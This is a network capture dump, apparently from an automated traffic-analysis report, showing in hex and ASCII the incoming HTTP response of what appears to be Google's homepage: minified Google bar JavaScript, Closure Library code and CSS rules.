                                  2021-09-14 19:48:21 UTC1INData Raw: 31 34 36 36 39 2c 36 30 33 2c 32 36 32 34 2c 32 38 34 35 2c 37 2c 31 32 33 35 34 2c 35 30 39 36 2c 31 31 36 32 34 2c 34 36 39 36 2c 39 30 38 2c 32 2c 33 35 35 35 2c 33 34 32 34 2c 31 30 2c 33 34 39 2c 39 33 35 39 2c 33 2c 33 34 36 2c 32 33 30 2c 31 30 31 34 2c 31 2c 35 34 34 34 2c 31 34 39 2c 31 31 33 32 33 2c 32 36 35 32 2c 34 2c 31 35 32 38 2c 32 33 30 34 2c 31 32 33 38 2c 35 38 30 31 2c 37 34 2c 31 39 38 33 2c 32 36 32 37 2c 32 30 31 34 2c 31 33 36 31 31 2c 34 37 36 34 2c 32 36 35 38 2c 38 37 32 2c 33 33 37 31 2c 33 31 31 32 2c 33 32 2c 35 36 36 33 2c 37 39 36 35 2c 32 33 30 35 2c 36 33 38 2c 37 30 38 30 2c 33 37 37 32 2c 37 34 32 38 2c 35 38 31 38 2c 32 35 33 39 2c 39 39 32 2c 33 31 30 32 2c 33 31 33 39 2c 35 2c 39 30 38 2c 33 2c 33 35 34 31 2c 31 2c
                                  Data Ascii: 14669,603,2624,2845,7,12354,5096,11624,4696,908,2,3555,3424,10,349,9359,3,346,230,1014,1,5444,149,11323,2652,4,1528,2304,1238,5801,74,1983,2627,2014,13611,4764,2658,872,3371,3112,32,5663,7965,2305,638,7080,3772,7428,5818,2539,992,3102,3139,5,908,3,3541,1,
                                  2021-09-14 19:48:21 UTC2INData Raw: 3b 72 65 74 75 72 6e 20 62 7c 7c 68 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 6e 75 6c 6c 3b 61 26 26 28 21 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 7c 7c 21 28 62 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6c 65 69 64 22 29 29 29 3b 29 61 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 7d 0a 66 75 6e 63 74 69 6f 6e 20 6e 28 61 2c 62 2c 63 2c 64 2c 67 29 7b 76 61 72 20 65 3d 22 22 3b 63 7c 7c 2d 31 21 3d 3d 62 2e 73 65 61 72 63 68 28 22 26 65 69 3d 22 29 7c 7c 28 65 3d 22 26 65 69 3d 22 2b 6c 28 64 29 2c 2d 31 3d 3d 3d 62 2e 73 65 61 72 63 68 28 22 26 6c 65 69 3d 22 29 26 26 28 64 3d 6d 28 64 29 29 26 26 28 65 2b 3d 22 26 6c 65 69 3d 22 2b 64 29 29 3b 64 3d 22 22 3b 21 63 26 26 66 2e 5f 63 73 68
                                  Data Ascii: ;return b||h}function m(a){for(var b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid")));)a=a.parentNode;return b}function n(a,b,c,d,g){var e="";c||-1!==b.search("&ei=")||(e="&ei="+l(d),-1===b.search("&lei=")&&(d=m(d))&&(e+="&lei="+d));d="";!c&&f._csh
                                  2021-09-14 19:48:21 UTC3INData Raw: 67 65 74 29 7b 76 61 72 20 63 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 75 62 6d 69 74 66 61 6c 73 65 22 29 3b 61 3d 22 31 22 3d 3d 3d 63 7c 7c 22 71 22 3d 3d 3d 63 26 26 21 61 2e 65 6c 65 6d 65 6e 74 73 2e 71 2e 76 61 6c 75 65 3f 21 30 3a 21 31 7d 65 6c 73 65 20 61 3d 21 31 3b 61 26 26 28 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 62 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 29 7d 2c 21 30 29 3b 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 61 3b 61 3a 7b 66 6f 72 28 61 3d 62 2e 74 61 72 67 65 74 3b 61 26 26 61 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f
                                  Data Ascii: get){var c=a.getAttribute("data-submitfalse");a="1"===c||"q"===c&&!a.elements.q.value?!0:!1}else a=!1;a&&(b.preventDefault(),b.stopPropagation())},!0);document.documentElement.addEventListener("click",function(b){var a;a:{for(a=b.target;a&&a!==document.do
                                  2021-09-14 19:48:21 UTC5INData Raw: 73 6f 6c 75 74 65 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 3b 74 6f 70 3a 2d 39 39 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 2d 31 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 72 74 6c 20 2e 67 62 6d 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f
                                  Data Ascii: solute;z-index:999;top:-999px;visibility:hidden;text-align:left;border:1px solid #bebebe;background:#fff;-moz-box-shadow:-1px 1px 1px rgba(0,0,0,.2);-webkit-box-shadow:0 2px 4px rgba(0,0,0,.2);box-shadow:0 2px 4px rgba(0,0,0,.2)}.gbrtl .gbm{-moz-box-shado
                                  2021-09-14 19:48:21 UTC6INData Raw: 74 6f 70 7d 2e 67 62 74 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 67 62 74 6f 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 7a 74 2c 2e 67 62 67 74 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 73 70 61 6e 23 67 62 67 36 2c 73 70 61 6e 23 67 62 67 34 7b 63 75 72 73 6f 72 3a 64 65 66
                                  Data Ascii: top}.gbt{*display:inline}.gbto{box-shadow:0 2px 4px rgba(0,0,0,.2);-moz-box-shadow:0 2px 4px rgba(0,0,0,.2);-webkit-box-shadow:0 2px 4px rgba(0,0,0,.2)}.gbzt,.gbgt{cursor:pointer;display:block;text-decoration:none !important}span#gbg6,span#gbg4{cursor:def
                                  2021-09-14 19:48:21 UTC7INData Raw: 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 64 64 34 62 33 39 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 34 73 2c 23 67 62 69 34 73 31 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 23 67 62 67 36 2e 67 62 67 74 2d 68 76 72 2c 23 67 62 67 36 2e 67 62 67 74 3a 66 6f 63 75 73 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 7d 2e 67 62 67 34 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 7d 2e 67 62 67 34 61 20 2e 67 62 74 73 7b 70 61 64 64 69 6e 67 3a 32 37 70 78 20 35 70 78 20 30 3b 2a 70 61 64 64 69 6e 67 3a 32 35 70 78 20 35 70 78 20 30 7d 2e 67 62 74 6f 20 2e 67 62 67 34 61 20 2e 67 62 74 73 7b 70
                                  Data Ascii: border-top-color:#dd4b39!important}#gbi4s,#gbi4s1{font-weight:bold}#gbg6.gbgt-hvr,#gbg6.gbgt:focus{background-color:transparent;background-image:none}.gbg4a{font-size:0;line-height:0}.gbg4a .gbts{padding:27px 5px 0;*padding:25px 5px 0}.gbto .gbg4a .gbts{p
                                  2021-09-14 19:48:21 UTC8INData Raw: 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 6d 74 2c 2e 67 62 6d 74 3a 76 69 73 69 74 65 64 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 31 30 70 78 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 62 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 2c 2e 67 62 6d 6c 62 3a 76 69 73 69 74 65 64 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 67 62 6d 6c 31 2c 2e 67 62 6d 6c 31 3a 76 69 73 69 74 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 31 30 70 78 7d 2e 67 62 6d 6c 31 2d 68 76 72 2c 2e 67 62 6d 6c 31 3a 66 6f
                                  Data Ascii: coration:none !important}.gbmt,.gbmt:visited{display:block}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{display:inline-block;margin:0 10px}.gbml1,.gbmlb,.gbml1:visited,.gbmlb:visited{*display:inline}.gbml1,.gbml1:visited{padding:0 10px}.gbml1-hvr,.gbml1:fo
                                  2021-09-14 19:48:21 UTC10INData Raw: 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 23 67 62 6d 70 73 7b 2a 7a 6f 6f 6d 3a 31 7d 23 67 62 64 34 20 2e 67 62 70 63 2c 23 67 62 6d 70 61 73 20 2e 67 62 6d 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 37 70 78 7d 23 67 62 64 34 20 2e 67 62 70 67 73 20 2e 67 62 6d 74 63 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 7d 23 67 62 64 34 20 2e 67 62 6d 74 63 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 7d 23 67 62 64 34 20 2e 67 62 70 63 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 31 36 70 78 20 30 20 31 30 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 23 67 62 64 34 20 2e 67 62 70 63
                                  Data Ascii: tion:absolute}#gbmps{*zoom:1}#gbd4 .gbpc,#gbmpas .gbmt{line-height:17px}#gbd4 .gbpgs .gbmtc{line-height:27px}#gbd4 .gbmtc{border-bottom:1px solid #bebebe}#gbd4 .gbpc{display:inline-block;margin:16px 0 10px;padding-right:50px;vertical-align:top}#gbd4 .gbpc
                                  2021-09-14 19:48:21 UTC11INData Raw: 20 32 30 70 78 20 31 30 70 78 7d 2e 67 62 6d 70 69 61 77 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 67 62 78 76 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 67 62 6d 70 69 61 61 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 67 62 6d 70 69 61 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 34 38 70 78 3b 77 69 64 74 68 3a 34 38 70 78 7d 2e 67 62 6d 70 6e 77 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b
                                  Data Ascii: 20px 10px}.gbmpiaw{display:inline-block;padding-right:10px;margin-bottom:6px;margin-top:10px}.gbxv{visibility:hidden}.gbmpiaa{display:block;margin-top:10px}.gbmpia{border:none;display:block;height:48px;width:48px}.gbmpnw{display:inline-block;height:auto;
                                  2021-09-14 19:48:21 UTC12INData Raw: 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 2e 67 62 71 66 62 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 2e 67 62 71 66 62 61 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 2e 67 62 71 66 62 62 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 3a 30 7d 2e 67 62 71 66 62 61 2c 2e 67 62 71 66 62 62 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 63 64 63 64 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 63 6f 6c 6f 72 3a 23 34 34 34 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 7d 2e 67 62 71
                                  Data Ascii: 1px 1px rgba(0,0,0,.1);box-shadow:0 1px 1px rgba(0,0,0,.1)}.gbqfb::-moz-focus-inner,.gbqfba::-moz-focus-inner,.gbqfbb::-moz-focus-inner{border:0}.gbqfba,.gbqfbb{border:1px solid #dcdcdc;border-color:rgba(0,0,0,.1);color:#444 !important;font-size:11px}.gbq
                                  2021-09-14 19:48:21 UTC14INData Raw: 39 30 66 65 2c 23 33 35 37 61 65 38 29 7d 2e 67 62 71 66 62 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 33 29 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 33 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 33 29 7d 2e 67 62 71 66 62 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d
                                  Data Ascii: 90fe,#357ae8)}.gbqfb:active{background-color:inherit;-webkit-box-shadow:inset 0 1px 2px rgba(0, 0, 0, 0.3);-moz-box-shadow:inset 0 1px 2px rgba(0, 0, 0, 0.3);box-shadow:inset 0 1px 2px rgba(0, 0, 0, 0.3)}.gbqfba{background-color:#f5f5f5;background-image:-
                                  2021-09-14 19:48:21 UTC15INData Raw: 69 65 6e 74 28 6c 69 6e 65 61 72 2c 6c 65 66 74 20 74 6f 70 2c 6c 65 66 74 20 62 6f 74 74 6f 6d 2c 66 72 6f 6d 28 23 66 66 66 29 2c 74 6f 28 23 66 62 66 62 66 62 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 66 66 2c 23 66 62 66 62 66 62 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 66 66 2c 23 66 62 66 62 66 62 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 73 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 70 2c 23 66 66 66 2c 23 66 62 66 62 66 62 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6f 2d 6c 69 6e 65 61 72 2d 67
                                  Data Ascii: ient(linear,left top,left bottom,from(#fff),to(#fbfbfb));background-image:-webkit-linear-gradient(top,#fff,#fbfbfb);background-image:-moz-linear-gradient(top,#fff,#fbfbfb);background-image:-ms-linear-gradient(top,#fff,#fbfbfb);background-image:-o-linear-g
                                  2021-09-14 19:48:21 UTC16INData Raw: 69 6e 73 65 74 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 7d 0a 23 67 62 6d 70 61 73 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 32 30 70 78 7d 23 67 62 6d 6d 7b 6d 61 78 2d 68 65 69 67 68 74 3a 35 33 30 70 78 7d 2e 67 62 73 62 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 2a 7a 6f 6f 6d 3a 31 7d 2e 67 62 73 62 69 63 7b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 7d 2e 67 62 73 62 69 73 20 2e 67 62 73 62 74 2c 2e 67 62 73 62 69 73 20 2e 67 62 73 62 62 7b 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 2d 62 6f 78 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 67 72 61 64 69 65 6e 74 28 6c 69 6e 65 61 72 2c
                                  Data Ascii: inset 0 1px 2px rgba(0,0,0,.1)}#gbmpas{max-height:220px}#gbmm{max-height:530px}.gbsb{-webkit-box-sizing:border-box;display:block;position:relative;*zoom:1}.gbsbic{overflow:auto}.gbsbis .gbsbt,.gbsbis .gbsbb{-webkit-mask-box-image:-webkit-gradient(linear,
                                  2021-09-14 19:48:21 UTC17INData Raw: 20 62 6f 74 74 6f 6d 2c 6c 65 66 74 20 74 6f 70 2c 66 72 6f 6d 28 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 29 2c 74 6f 28 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 2c 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 2d 6d 73 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 62 6f 74 74 6f 6d 2c 72
                                  Data Ascii: bottom,left top,from(rgba(0,0,0,.2)),to(rgba(0,0,0,0)));background-image:-webkit-linear-gradient(bottom,rgba(0,0,0,.2),rgba(0,0,0,0));background-image:-moz-linear-gradient(bottom,rgba(0,0,0,.2),rgba(0,0,0,0));background-image:-ms-linear-gradient(bottom,r
                                  2021-09-14 19:48:21 UTC19INData Raw: 64 61 64 63 65 30 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 6c 73 62 62 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 23 57 71 51 41 4e 62 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 6c 73 62 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 69 6d 61 67 65 73 2f 6e 61 76 5f 6c 6f 67 6f 32 32 39 2e 70 6e 67 29 20 30 20 2d 32 36 31 70 78 20 72 65 70 65 61 74 2d 78 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 6d 61 72 67 69 6e 3a 30 3b 6f 75 74 6c 69 6e 65 3a 30 3b 66 6f 6e 74 3a 31 35 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69
                                  Data Ascii: dadce0;height:30px}.lsbb{display:block}#WqQANb a{display:inline-block;margin:0 12px}.lsb{background:url(/images/nav_logo229.png) 0 -261px repeat-x;border:none;color:#000;cursor:pointer;height:30px;margin:0;outline:0;font:15px arial,sans-serif;vertical-ali
                                  2021-09-14 19:48:21 UTC20INData Raw: 2c 21 31 2c 67 6f 6f 67 6c 65 2e 64 6c 3f 30 3a 32 29 3b 70 3d 6e 75 6c 6c 3b 6c 26 26 6e 3e 3d 6b 26 26 28 77 69 6e 64 6f 77 2e 6f 6e 65 72 72 6f 72 3d 6e 75 6c 6c 29 7d 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 76 61 72 20 65 3d 74 68 69 73 7c 7c 73 65 6c 66 3b 76 61 72 20 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 64 3d 64 7c 7c 7b 7d 3b 64 2e 5f 73 6e 3d 5b 22 63 66 67 22 2c 62 2c 63 5d 2e 6a 6f 69 6e 28 22 2e 22 29 3b 77 69 6e 64 6f 77 2e 67 62 61 72 2e 6c 6f
                                  Data Ascii: ,!1,google.dl?0:2);p=null;l&&n>=k&&(window.onerror=null)};})();(function(){try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0*/var e=this||self;var aa=function(a,b,c,d){d=d||{};d._sn=["cfg",b,c].join(".");window.gbar.lo
                                  2021-09-14 19:48:21 UTC21INData Raw: 71 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 20 69 6e 20 76 7d 2c 78 3d 7b 7d 2c 41 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 78 5b 61 5d 7c 7c 28 0d 0a
                                  Data Ascii: qa=function(a){return a in v},x={},A=function(a,b){x[a]||(
                                  2021-09-14 19:48:21 UTC21INData Raw: 65 39 0d 0a 78 5b 61 5d 3d 5b 5d 29 3b 78 5b 61 5d 2e 70 75 73 68 28 62 29 7d 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 41 28 22 6d 22 2c 61 29 7d 2c 72 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 63 2e 73 72 63 3d 61 3b 63 2e 61 73 79 6e 63 3d 6e 61 3b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3c 6d 61 26 26 28 63 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 6f 6e 65 72 72 6f 72 3d 6e 75 6c 6c 3b 74 28 45 72 72 6f 72 28 22 42 75 6e 64 6c 65 20 6c 6f 61 64 20 66 61 69 6c 65 64 3a 20 6e 61 6d 65 3d 22 2b 28 62 7c 7c 22 55 4e 4b 22 29 2b 22 20 75 72 6c 3d 22 2b 61 0d 0a
                                  Data Ascii: e9x[a]=[]);x[a].push(b)},B=function(a){A("m",a)},ra=function(a,b){var c=document.createElement("script");c.src=a;c.async=na;Math.random()<ma&&(c.onerror=function(){c.onerror=null;t(Error("Bundle load failed: name="+(b||"UNK")+" url="+a
                                  2021-09-14 19:48:21 UTC22INData Raw: 36 61 36 64 0d 0a 29 29 7d 29 3b 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 6a 73 63 22 29 7c 7c 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 62 6f 64 79 22 29 5b 30 5d 7c 7c 0a 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 29 7d 2c 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 30 2c 63 3b 28 63 3d 77 5b 62 5d 29 26 26 63 5b 30 5d 21 3d 61 3b 2b 2b 62 29 3b 21 63 7c 7c 63 5b 31 5d 2e 6c 7c 7c 63 5b 31 5d 2e 73 7c 7c 28 63 5b 31 5d 2e 73 3d 21 30 2c 73 61 28 32 2c 61 29 2c 63 5b 31 5d 2e 75 72 6c 26 26 72 61 28 63 5b 31 5d 2e 75
                                  Data Ascii: 6a6d))});(document.getElementById("xjsc")||document.getElementsByTagName("body")[0]||document.getElementsByTagName("head")[0]).appendChild(c)},D=function(a){for(var b=0,c;(c=w[b])&&c[0]!=a;++b);!c||c[1].l||c[1].s||(c[1].s=!0,sa(2,a),c[1].url&&ra(c[1].u
                                  2021-09-14 19:48:21 UTC23INData Raw: 6d 73 2c 22 68 74 74 70 73 3a 2f 2f 61 70 69 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 29 3b 47 2e 6d 3d 46 28 47 2e 6d 2c 22 22 29 3b 47 2e 6c 3d 46 28 47 2e 6c 2c 5b 5d 29 3b 47 2e 64 70 6f 3d 46 28 47 2e 64 70 6f 2c 22 22 29 3b 78 61 7c 7c 77 2e 70 75 73 68 28 5b 22 67 6c 22 2c 7b 75 72 6c 3a 22 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 6a 73 2f 61 62 63 2f 67 6c 6d 5f 65 37 62 62 33 39 61 37 65 31 61 32 34 35 38 31 66 66 34 66 38 64 31 39 39 36 37 38 62 31 62 39 2e 6a 73 22 7d 5d 29 3b 76 61 72 20 45 61 3d 7b 70 75 3a 79 61 2c 73 68 3a 22 22 2c 73 69 3a 7a 61 2c 68 6c 3a 22 65 6e 22 7d 3b 76 2e 67 6c 3d 45 61 3b 77 61 3f 41 61 2e 6c 6f 61 64 7c 7c 70 28 22 6c 6f 61 64 22 2c 42 61 2c 41 61 29 3a 70 28 22 6c 6f 61 64 22 2c 42 61 2c 41
